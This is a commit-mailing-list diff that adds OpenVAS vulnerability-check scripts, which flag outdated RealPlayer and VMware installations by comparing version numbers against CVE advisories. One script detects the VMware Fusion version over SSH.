+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902761);
+  script_version("$Revision$");
+  script_bugtraq_id(50741);
+  script_cve_id("CVE-2011-4253", "CVE-2011-4252", "CVE-2011-4250", "CVE-2011-4246",
+                "CVE-2011-4245", "CVE-2011-4255", "CVE-2011-4256");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 13:01:59 +0530 (Tue, 29 Nov 2011)");
+  script_name("RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Mac OS X)");
+  desc = "
+  Overview: This host is installed with RealPlayer which is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Unspecified errors in RV20, RV10, RV30, ATRC and AAC codec, allows
+    attackers to execute arbitrary code via unspecified vectors.
+  - An unspecified error related to RealVideo rendering can be exploited
+    to corrupt memory.
+
+  Impact:
+  Successful exploitation allows remote attackers to execute arbitrary code or
+  cause a denial of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  RealPlayer version prior to 12.0.0.1703 on Mac OS X
+
+  Fix: Upgrade to RealPlayer version 12.0.0.1703 or later,
+  For Updates Refer, http://www.real.com/player
+
+  References:
+  http://secunia.com/advisories/46963/
+  http://service.real.com/realplayer/security/11182011_player/en/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of RealPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("General");
+  script_dependencies("secpod_realplayer_detect_macosx.nasl");
+  script_require_keys("RealPlayer/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+rpVer = get_kb_item("RealPlayer/MacOSX/Version");
+if(isnull(rpVer)){
+  exit(0);
+}
+
+## Check for Realplayer version
+if(version_is_less(version:rpVer, test_version:"12.0.0.1703")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,97 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Win)
+#
+# Authors:
+# Madhuri D <dmadhuri at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902762);
+  script_version("$Revision$");
+  script_bugtraq_id(50741);
+  script_cve_id("CVE-2011-4253", "CVE-2011-4252", "CVE-2011-4251", "CVE-2011-4250",
+                "CVE-2011-4249", "CVE-2011-4248", "CVE-2011-4247", "CVE-2011-4246",
+                "CVE-2011-4245", "CVE-2011-4244", "CVE-2011-4254", "CVE-2011-4255",
+                "CVE-2011-4262", "CVE-2011-4261", "CVE-2011-4260", "CVE-2011-4259",
+                "CVE-2011-4258", "CVE-2011-4257", "CVE-2011-4256");
+  script_tag(name:"cvss_base", value:"10.0");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-29 13:58:17 +0530 (Tue, 29 Nov 2011)");
+  script_name("RealNetworks RealPlayer Multiple Vulnerabilities Nov - 11 (Win)");
+  desc = "
+  Overview: This host is installed with RealPlayer which is prone to multiple
+  vulnerabilities.
+
+  Vulnerability Insight:
+  Multiple flaws are due to,
+  - Unspecified errors in RV20, RV10, RV30, ATRC and AAC codec, allows
+    attackers to execute arbitrary code via unspecified vectors.
+  - An unspecified error related to RealVideo rendering, related to MP4 video
+    dimensions can be exploited to corrupt memory.
+  - An unspecified error exists when parsing of QCELP streams, MP4 headers,
+    MP4 files and the channel within the Cook codec and MLTI chunk length
+    within IVR files.
+  - An unspecified error exists related to sample size when parsing RealAudio
+    files.
+  - An unspecified error exists when handling RTSP SETUP requests.
+
+  Impact:
+  Successful exploitation will let the attacker execute arbitrary codes within
+  the context of the application and can cause heap overflow or cause denial
+  of service.
+
+  Impact Level: Application
+
+  Affected Software/OS:
+  RealPlayer versions prior to 15.0.0
+
+  Fix: Upgrade to RealPlayer version 15.0.0 or later
+  For Updates Refer, http://www.real.com/player
+
+  References:
+  http://secunia.com/advisories/46954/
+  http://service.real.com/realplayer/security/11182011_player/en/ ";
+
+  script_description(desc);
+  script_summary("Check for the version of RealPlayer");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (C) 2011 SecPod");
+  script_family("General");
+  script_dependencies("gb_realplayer_detect_win.nasl");
+  script_require_keys("RealPlayer/Win/Ver");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+rpVer = get_kb_item("RealPlayer/Win/Ver");
+if(isnull(rpVer)){
+  exit(0);
+}
+
+# Real player versions < 15.0.0
+if(version_is_less(version:rpVer, test_version:"15.0.0.198")){
+  security_hole(0);
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_realplayer_mult_vuln_nov11_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,95 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Fusion Version Detection (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+SCRIPT_OID  = "1.3.6.1.4.1.25623.1.0.902633";
+
+if(description)
+{
+  script_oid(SCRIPT_OID);
+  script_version("$Revision$");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 17:38:48 +0530 (Thu, 17 Nov 2011)");
+  script_tag(name:"cvss_base", value:"0.0");
+  script_tag(name:"risk_factor", value:"None");
+  script_tag(name:"detection", value:"executable version check");
+  script_name("VMware Fusion Version Detection (Mac OS X)");
+  script_description("Detection of installed version of VMware Fusion.
+
+The script logs in via ssh, searches for folder 'VMware Fusion.app' and
+queries the related 'info.plist' file for string 'CFBundleShortVersionString'
+via command line option 'defaults read'.");
+
+  script_summary("Detection of installed version of VMware Fusion");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_dependencies("gather-package-list.nasl");
+  script_family("Product detection");
+  exit(0);
+}
+
+
+include("ssh_func.inc");
+include("version_func.inc");
+include("cpe.inc");
+include("host_details.inc");
+
+## Checking OS
+sock = ssh_login_or_reuse_connection();
+if(!sock) {
+  if (defined_func("error_message"))
+    error_message(port:port, data:"Failed to open ssh port.");
+  exit(-1);
+}
+
+## Checking for Mac OS X
+if (!get_kb_item("ssh/login/osx_name")){
+  exit(0);
+}
+
+## Get the version of VMware Fusion Version
+vmfusionVer = chomp(ssh_cmd(socket:sock, cmd:"defaults read /Applications/" +
+                "VMware\\ Fusion.app/Contents/Info CFBundleShortVersionString"));
+
+## Close Socket
+close(sock);
+
+## Exit if version not found
+if(isnull(vmfusionVer) || "does not exist" >< vmfusionVer){
+  exit(0);
+}
+
+## Set the version in KB
+set_kb_item(name: "VMware/Fusion/MacOSX/Version", value:vmfusionVer);
+log_message(data:'Detected VMware version: ' + vmfusionVer +
+        '\nLocation: /Applications/VMware Fusion.app' +
+        '\n\nConcluded from version identification result:\n' + "VMware Fusion " + vmfusionVer);
+
+## build cpe and store it as host_detail
+cpe = build_cpe(value:vmfusionVer, exp:"^([0-9.]+)", base:"cpe:/a:vmware:fusion:");
+if(!isnull(cpe))
+  register_product(cpe:cpe, location:"/Applications/VMware Fusion.app", nvt:SCRIPT_OID);
+else
+  cpe = "Failed";


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_fusion_detect_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,87 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Fusion UDF File Systems Buffer Overflow Vulnerability (Mac OS X)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902634);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 17:54:28 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Fusion UDF File Systems Buffer Overflow Vulnerability (Mac OS X)");
+  desc = "
+  Overview: The host is installed with VMWare Fusion and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images. This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Fusion 3.1.0 before 3.1.3
+
+  Fix : Upgrade to Vmware Fusion version 3.1.3 or later
+  For Upgrades refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Fusion");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("secpod_vmware_fusion_detect_macosx.nasl");
+  script_require_keys("VMware/Fusion/MacOSX/Version");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Fusion/MacOSX/Version")){
+  exit(0);
+}
+
+# Check for VMware Fusion
+vmfusionVer = get_kb_item("VMware/Fusion/MacOSX/Version");
+if(vmfusionVer != NULL )
+{
+  if(version_in_range(version:vmfusionVer, test_version:"3.1.0", test_version2:"3.1.2")){
+    security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_fusion_udf_filesys_bof_vuln_macosx.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Products UDF File Systems Buffer Overflow Vulnerability (Linux)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902490);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 15:10:19 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Products UDF File Systems Buffer Overflow Vulnerability (Linux)");
+  desc = "
+  Overview: The host is installed with VMWare products and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images.This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Player version 3.0 before 3.1.5,
+  VMware Workstation version 7.0 before 7.1.5
+
+  Fix : Upgrade to Vmware Player version 3.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  Upgrade to Vmware Workstation version 7.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_vmware_prdts_detect_lin.nasl");
+  script_require_keys("VMware/Linux/Installed");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Linux/Installed")){
+  exit(0);
+}
+
+# Check for VMware Player
+vmplayerVer = get_kb_item("VMware/Player/Linux/Ver");
+if(vmplayerVer != NULL )
+{
+  if(version_in_range(version:vmplayerVer, test_version:"3.0", test_version2:"3.1.4"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for VMware Workstation
+vmworkstnVer = get_kb_item("VMware/Workstation/Linux/Ver");
+if(vmworkstnVer != NULL)
+{
+  if(version_in_range(version:vmworkstnVer, test_version:"7.0", test_version2:"7.1.4")){
+      security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_lin.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id

Added: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
===================================================================
--- trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl	2011-11-30 14:51:37 UTC (rev 12226)
+++ trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl	2011-11-30 15:19:06 UTC (rev 12227)
@@ -0,0 +1,102 @@
+###############################################################################
+# OpenVAS Vulnerability Test
+# $Id$
+#
+# VMware Products UDF File Systems Buffer Overflow Vulnerability (Win)
+#
+# Authors:
+# Rachana Shetty <srachana at secpod.com>
+#
+# Copyright:
+# Copyright (c) 2011 SecPod, http://www.secpod.com
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2
+# (or any later version), as published by the Free Software Foundation.
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+###############################################################################
+
+if(description)
+{
+  script_id(902631);
+  script_version("$Revision$");
+  script_cve_id("CVE-2011-3868");
+  script_bugtraq_id(49942);
+  script_tag(name:"cvss_base", value:"9.3");
+  script_tag(name:"risk_factor", value:"Critical");
+  script_tag(name:"last_modification", value:"$Date$");
+  script_tag(name:"creation_date", value:"2011-11-17 15:15:00 +0530 (Thu, 17 Nov 2011)");
+  script_name("VMware Products UDF File Systems Buffer Overflow Vulnerability (Win)");
+  desc = "
+  Overview: The host is installed with VMWare products and are prone to
+  buffer overflow vulnerability.
+
+  Vulnerability Insight:
+  The flaw is due to an error when handling UDF filesystem images. This can be
+  exploited to cause a buffer overflow via a specially crafted ISO image file.
+
+  Impact:
+  Successful exploitation will let the attacker to execution of arbitrary code.
+
+  Impact Level: System/Application
+
+  Affected Software/OS:
+  Vmware Player 3.0 before 3.1.5,
+  VMware Workstation 7.0 before 7.1.5
+
+  Fix : Upgrade to Vmware Player version 3.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  Upgrade to Vmware Workstation version 7.1.5 or later
+  For updates refer, http://www.vmware.com/security/advisories/VMSA-2011-0011.html
+
+  References:
+  http://osvdb.org/76060
+  http://secunia.com/advisories/46241
+  http://www.securitytracker.com/id?1026139
+  http://www.vmware.com/security/advisories/VMSA-2011-0011.html ";
+
+  script_description(desc);
+  script_summary("Check for the version of VMware Products");
+  script_category(ACT_GATHER_INFO);
+  script_copyright("Copyright (c) 2011 SecPod");
+  script_family("Buffer overflow");
+  script_dependencies("gb_vmware_prdts_detect_win.nasl");
+  script_require_keys("VMware/Win/Installed");
+  exit(0);
+}
+
+
+include("version_func.inc");
+
+if(!get_kb_item("VMware/Win/Installed")){
+  exit(0);
+}
+
+# Check for VMware Player
+vmplayerVer = get_kb_item("VMware/Player/Win/Ver");
+if(vmplayerVer != NULL )
+{
+  if(version_in_range(version:vmplayerVer, test_version:"3.0", test_version2:"3.1.4"))
+  {
+    security_hole(0);
+    exit(0);
+  }
+}
+
+# Check for VMware Workstation
+vmworkstnVer = get_kb_item("VMware/Workstation/Win/Ver");
+if(vmworkstnVer != NULL)
+{
+  if(version_in_range(version:vmworkstnVer, test_version:"7.0", test_version2:"7.1.4")){
+      security_hole(0);
+  }
+}


Property changes on: trunk/openvas-plugins/scripts/secpod_vmware_prdts_udf_filesys_bof_vuln_win.nasl
___________________________________________________________________
Name: svn:keywords
   + Revision Date Id



More information about the Openvas-commits mailing list